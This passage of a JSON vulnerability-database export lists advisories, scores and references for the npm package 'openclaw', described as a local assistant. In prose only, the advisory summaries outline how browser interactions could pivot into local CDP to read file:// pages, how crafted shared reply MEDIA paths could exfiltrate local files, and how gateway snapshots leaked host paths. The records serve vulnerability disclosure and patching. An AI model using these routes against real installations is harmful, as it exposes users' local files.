"VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "CVE-2026-34504", "GHSA-qxgf-hmcj-3xw3" ], "risk_score": 3.8, "exploitability": "0.5", "weighted_severity": "7.5", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-w2rd-2j4p-gfgw" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89348?format=api", "vulnerability_id": "VCID-w2tj-nqa6-cuam", "summary": "OpenClaw: Browser interaction routes could pivot into local CDP and regain file reads\n## Summary\n\nBrowser interaction routes could pivot into local CDP and regain file reads.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.9`\n- Patched versions: `>= 2026.4.9`\n\n## Impact\n\nBrowser act/evaluate interactions could trigger navigation into the local CDP origin and then create or read disallowed `file://` pages despite direct navigation guards.\n\n## Technical Details\n\nThe fix re-checks browser URLs after interaction-driven navigations and blocks targets that violate the configured navigation policy.\n\n## Fix\n\nThe issue was fixed in #63226. The first stable tag containing the fix is `v2026.4.9`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `5f5b3d733bdd791cb457f838514179e1288b10b3`\n- PR: #63226\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.9 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @tdjackey for reporting this issue.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/5f5b3d733bdd791cb457f838514179e1288b10b3", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/5f5b3d733bdd791cb457f838514179e1288b10b3" }, { "reference_url": "https://github.com/openclaw/openclaw/pull/63226", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/pull/63226" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qmwg-qprg-3j38", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qmwg-qprg-3j38" }, { "reference_url": "https://github.com/advisories/GHSA-qmwg-qprg-3j38", "reference_id": "GHSA-qmwg-qprg-3j38", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-qmwg-qprg-3j38" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110121?format=api", "purl": "pkg:npm/openclaw@2026.4.9", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2g7x-vu14-nkde" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dqb2-dej7-augt" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hy24-6xpe-pkb7" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-k8x3-9pv7-rfax" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-rvcq-rqbq-4khp" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-wyat-1259-2kg9" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.9" } ], "aliases": [ "GHSA-qmwg-qprg-3j38" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-w2tj-nqa6-cuam" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89467?format=api", "vulnerability_id": "VCID-w4p1-sxdg-hyha", "summary": "OpenClaw: Shared reply MEDIA - paths are treated as trusted and can trigger cross-channel local file exfiltration\n## Impact\n\nShared reply MEDIA: paths are treated as trusted and can trigger cross-channel local file exfiltration.\n\nA crafted shared reply MEDIA reference could cause another channel to read a local file path as trusted generated media.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<=2026.4.4`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @threalwinky for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42424", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00029", "scoring_system": "epss", "scoring_elements": "0.0867", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00029", "scoring_system": "epss", "scoring_elements": "0.0869", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00029", "scoring_system": "epss", "scoring_elements": "0.08675", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42424" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N" }, { "value": "5.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "5.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:12:58Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qqq7-4hxc-x63c", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N" }, { "value": "5.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "5.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:12:58Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qqq7-4hxc-x63c" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42424", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42424" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-local-file-exfiltration-via-shared-reply-media-paths", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N" }, { "value": "5.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "5.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:12:58Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-local-file-exfiltration-via-shared-reply-media-paths" }, { "reference_url": "https://github.com/advisories/GHSA-qqq7-4hxc-x63c", "reference_id": "GHSA-qqq7-4hxc-x63c", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-qqq7-4hxc-x63c" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api", "purl": "pkg:npm/openclaw@2026.4.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2g7x-vu14-nkde" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dqb2-dej7-augt" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hy24-6xpe-pkb7" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-wyat-1259-2kg9" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8" } ], "aliases": [ "CVE-2026-42424", "GHSA-qqq7-4hxc-x63c" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-w4p1-sxdg-hyha" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89489?format=api", "vulnerability_id": "VCID-w58d-6veg-uugy", "summary": "OpenClaw: Gateway hello snapshots exposed host config and state paths to non-admin clients\n## Summary\n\nBefore OpenClaw 2026.4.2, the Gateway `connect` success snapshot exposed local `configPath` and `stateDir` metadata to non-admin clients. Low-privilege authenticated clients could learn host filesystem layout and deployment details that were not needed for their role.\n\n## Impact\n\nA non-admin client could recover host-specific filesystem paths and related deployment metadata, aiding host fingerprinting and chained attacks. This was an information-disclosure issue, not a direct authorization bypass.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `676b748056b5efca6f1255708e9dd9469edf5e2e` — limit connect snapshot metadata to admin-scoped clients\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @topsec-bunney for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41339", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00037", "scoring_system": "epss", "scoring_elements": "0.11323", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00037", "scoring_system": "epss", "scoring_elements": "0.11356", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00037", "scoring_system": "epss", "scoring_elements": "0.11364", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41339" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/676b748056b5efca6f1255708e9dd9469edf5e2e", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T13:34:47Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/676b748056b5efca6f1255708e9dd9469edf5e2e" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2f7j-rp58-mr42", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T13:34:47Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2f7j-rp58-mr42" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41339", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41339" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-information-disclosure-via-gateway-connect-snapshot", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T13:34:47Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-information-disclosure-via-gateway-connect-snapshot" }, { "reference_url": "https://github.com/advisories/GHSA-2f7j-rp58-mr42", "reference_id": "GHSA-2f7j-rp58-mr42", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-2f7j-rp58-mr42" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109939?format=api", "purl": "pkg:npm/openclaw@2026.4.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": 